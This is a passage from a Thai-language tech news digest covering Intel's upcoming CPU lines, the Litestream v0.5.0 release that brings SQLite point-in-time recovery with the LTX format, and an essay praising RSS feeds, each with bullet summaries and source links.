Coral Rapids ➡️ มีการกล่าวถึง Panther Cove-X สำหรับเวิร์กสเตชัน และ Wildcat Lake สำหรับ APU ระดับเริ่มต้น ➡️ Wildcat Lake ใช้ Cougar Cove P-Core และ Darkmont E-Core ➡️ Intel เตรียมแข่งขันกับ AMD Zen 6 ทั้งในตลาดผู้ใช้ทั่วไปและเซิร์ฟเวอร์ ✅ ข้อมูลเสริมจากภายนอก ➡️ Xe3 tile เป็น GPU แบบฝังรุ่นใหม่ที่เน้นประสิทธิภาพและการประหยัดพลังงาน ➡️ Panther Lake เป็นรุ่นก่อนหน้า Nova Lake ที่ใช้ Cougar Cove และ Darkmont ➡️ Coral Rapids จะนำ SMT กลับมาเพื่อรองรับงานเซิร์ฟเวอร์ที่ต้องการ multithreading ➡️ APU คือชิปที่รวม CPU และ GPU ไว้ในตัวเดียว เหมาะกับงานที่ต้องการกราฟิกแต่ไม่ใช้การ์ดจอแยก ➡️ การเพิ่มจำนวนคอร์ช่วยให้รองรับงานแบบ parallel ได้ดีขึ้น เช่น AI, simulation, และการประมวลผลข้อมูลขนาดใหญ่ https://www.tomshardware.com/pc-components/cpus/intels-next-gen-nova-lake-and-diamond-rapids-microarchitectures-get-official-confirmation-latest-isa-reference-doc-details-the-p-cores-and-e-cores-upcoming-cpus-will-use

🗄️ “Litestream v0.5.0 มาแล้ว — สำรอง SQLite แบบ Point-in-Time ได้จริง พร้อมฟอร์แมต LTX ที่เร็วกว่าและฉลาดกว่า” หลังจากหลายปีที่ SQLite ถูกมองว่าเหมาะกับงานเล็ก ๆ เท่านั้น เพราะไม่มีระบบสำรองข้อมูลที่ดีพอ ล่าสุด Litestream v0.5.0 ได้เปิดตัวพร้อมฟีเจอร์ใหม่ที่เปลี่ยนเกม — รองรับการกู้คืนฐานข้อมูลแบบ Point-in-Time Recovery (PITR) ด้วยฟอร์แมตใหม่ชื่อว่า LTX ซึ่งช่วยให้การสำรองและกู้คืนข้อมูลมีประสิทธิภาพสูงขึ้นอย่างมาก Litestream เป็นโปรแกรมโอเพ่นซอร์สที่ทำงานแบบ sidecar คอยจับการเปลี่ยนแปลงในฐานข้อมูล SQLite แล้วส่งไปเก็บไว้ใน object storage เช่น S3, Google Cloud หรือ Azure โดยไม่ต้องแก้ไขแอปพลิเคชันเดิมเลย และเมื่อเซิร์ฟเวอร์ล่ม ก็สามารถกู้คืนฐานข้อมูลกลับมาได้อย่างรวดเร็ว ในเวอร์ชันใหม่ Litestream ได้นำแนวคิดจาก LiteFS ซึ่งเป็นโปรเจกต์พี่น้องที่ใช้ FUSE filesystem มาใช้ โดยเปลี่ยนจากการเก็บข้อมูลแบบ WAL segment ไปเป็น LTX file ที่สามารถบีบอัดและจัดเรียงข้อมูลได้อย่างมีประสิทธิภาพ ทำให้สามารถกู้คืนฐานข้อมูลได้จากไฟล์เพียงไม่กี่ชุด ฟอร์แมต LTX ยังช่วยให้ Litestream ไม่ต้องใช้ระบบ “generation” แบบเดิมที่ซับซ้อน เพราะสามารถใช้ transaction ID ที่เพิ่มขึ้นเรื่อย ๆ เพื่อระบุสถานะของฐานข้อมูลในแต่ละช่วงเวลาได้ทันที นอกจากนี้ Litestream v0.5.0 ยังปรับปรุงระบบ replica ให้รองรับ NATS JetStream, ยกเลิกการใช้ CGO เพื่อให้ cross-compile ได้ง่ายขึ้น และเปลี่ยนมาใช้ modernc.org/sqlite แทน go-sqlite3 เพื่อรองรับระบบ build อัตโนมัติที่หลากหลายมากขึ้น ✅ ข้อมูลสำคัญจากข่าว ➡️ Litestream v0.5.0 รองรับ Point-in-Time Recovery ด้วยฟอร์แมต LTX ➡️ LTX ช่วยบีบอัดและจัดเรียงข้อมูลแบบ transaction-aware ทำให้กู้คืนได้เร็วขึ้น ➡️ ไม่ต้องใช้ระบบ generation แบบเดิมอีกต่อไป ใช้ transaction ID แทน ➡️ รองรับการสำรองข้อมูลไปยัง S3, Google Cloud, Azure และ NATS JetStream ➡️ ยกเลิก CGO และเปลี่ยนมาใช้ modernc.org/sqlite เพื่อรองรับ cross-compile ➡️ เพิ่มระบบ compaction แบบหลายระดับ: 30 วินาที, 5 นาที, 1 ชั่วโมง ➡️ รองรับการกู้คืนฐานข้อมูลด้วยไฟล์เพียงไม่กี่ชุดโดยไม่ต้องโหลดทั้งฐาน ➡️ ฟีเจอร์ใหม่ในอนาคต: Litestream VFS สำหรับ read-replica แบบทันทีจาก S3 ✅ ข้อมูลเสริมจากภายนอก ➡️ SQLite ใช้โครงสร้าง B-tree และจัดเก็บข้อมูลเป็น page ขนาด 4KB ➡️ WAL (Write-Ahead Logging) เป็นระบบที่ SQLite ใช้เพื่อจัดการการเขียนข้อมูล ➡️ LiteFS ใช้ FUSE เพื่อเข้าถึง SQLite โดยตรงและทำ replication แบบ live ➡️ Point-in-Time Recovery เป็นฟีเจอร์ที่นิยมในฐานข้อมูลใหญ่ เช่น PostgreSQL ➡️ modernc.org/sqlite เป็นไลบรารี Go ที่ไม่ต้องใช้ CGO ทำให้ build ได้ง่ายกว่า https://fly.io/blog/litestream-v050-is-here/

📡 “RSS กลับมาอีกครั้งในปี 2025 — เมื่อผู้ใช้เบื่ออัลกอริทึมและโหยหาการควบคุมเนื้อหาด้วยตัวเอง” ในยุคที่โซเชียลมีเดียเต็มไปด้วยอัลกอริทึมที่คัดกรองเนื้อหาแทนผู้ใช้ เสียงเรียกร้องให้กลับไปใช้ระบบที่ “ผู้ใช้ควบคุมเอง” กำลังดังขึ้นอีกครั้ง และ RSS (Really Simple Syndication) ก็กลับมาเป็นพระเอกที่หลายคนลืมไป บทความจาก Tom Burkert ชี้ให้เห็นว่า RSS ไม่ใช่แค่เทคโนโลยีเก่า แต่เป็น “โครงสร้างพื้นฐานของเว็บที่ดี” ที่ช่วยให้ผู้ใช้สามารถติดตามเนื้อหาจากแหล่งที่ตนเลือกได้โดยตรง โดยไม่ต้องผ่านการคัดกรองของแพลตฟอร์มกลาง ไม่ว่าจะเป็นบล็อก ข่าว หรือพอดแคสต์ — ถ้ามี RSS feed ก็สามารถรวมมาอ่านในที่เดียวได้ทันที Burkert เน้นย้ำว่า RSS คือการ “ควบคุมการรับรู้” ที่แท้จริง เพราะผู้ใช้เลือกเองว่าจะติดตามใคร ไม่ใช่ให้แพลตฟอร์มเลือกให้ และยังปลอดภัยจากการติดตามพฤติกรรมหรือโฆษณาแบบเจาะจง เพราะ RSS ไม่ต้องใช้บัญชี ไม่เก็บข้อมูล และไม่มีการแทรกโฆษณา ในขณะที่หลายเว็บไซต์เลิกให้บริการ RSS feed ด้วยเหตุผลด้านการตลาดและการควบคุม traffic ก็มีเครื่องมือใหม่อย่าง RSS.app ที่ช่วยสร้าง feed จากเว็บไซต์ที่ไม่มี RSS ได้ ทำให้ผู้ใช้สามารถกลับมารวบรวมเนื้อหาได้อย่างอิสระอีกครั้ง การกลับมาของ RSS ยังสะท้อนถึงแนวโน้มของ “เว็บแบบกระจายศูนย์” ที่ไม่พึ่งพาแพลตฟอร์มใหญ่ และเปิดโอกาสให้ผู้ใช้เป็นเจ้าของการรับรู้ของตัวเองอย่างแท้จริง ✅ ข้อมูลสำคัญจากข่าว ➡️ RSS เป็นระบบติดตามเนื้อหาที่ผู้ใช้ควบคุมเองได้โดยไม่ผ่านอัลกอริทึม ➡️ ผู้ใช้สามารถรวมเนื้อหาจากหลายแหล่งไว้ในที่เดียว เช่น ข่าว บล็อก พอดแคสต์ ➡️ RSS ไม่ต้องใช้บัญชี ไม่เก็บข้อมูล และไม่มีโฆษณาเจาะจง ➡️ Tom Burkert ยกย่อง RSS ว่าเป็น “โครงสร้างพื้นฐานของเว็บที่ดี” ➡️ RSS.app ช่วยสร้าง feed จากเว็บไซต์ที่ไม่มี RSS ได้ ➡️ การใช้ RSS สะท้อนแนวโน้มของเว็บแบบกระจายศูนย์ที่ผู้ใช้เป็นเจ้าของการรับรู้ ➡️ RSS ช่วยลดการพึ่งพาแพลตฟอร์มกลางและเพิ่มความเป็นส่วนตัวในการติดตามเนื้อหา ✅ ข้อมูลเสริมจากภายนอก ➡️ RSS เริ่มต้นในยุค 90s และเคยเป็นเทคโนโลยีหลักในการติดตามเนื้อหาเว็บ ➡️ การลดลงของ RSS เกิดจากการเติบโตของโซเชียลมีเดียและแอปมือถือ ➡️ OPML คือไฟล์ที่ใช้รวม feed หลายรายการไว้ในที่เดียว ➡️ Feed reader เช่น Feedly, Inoreader, NetNewsWire ยังได้รับความนิยมในกลุ่มผู้ใช้เฉพาะ ➡️ การกลับมาใช้ RSS ช่วยเพิ่ม productivity และลดการเสพเนื้อหาที่ไม่จำเป็น https://blog.burkert.me/posts/in_praise_of_syndication/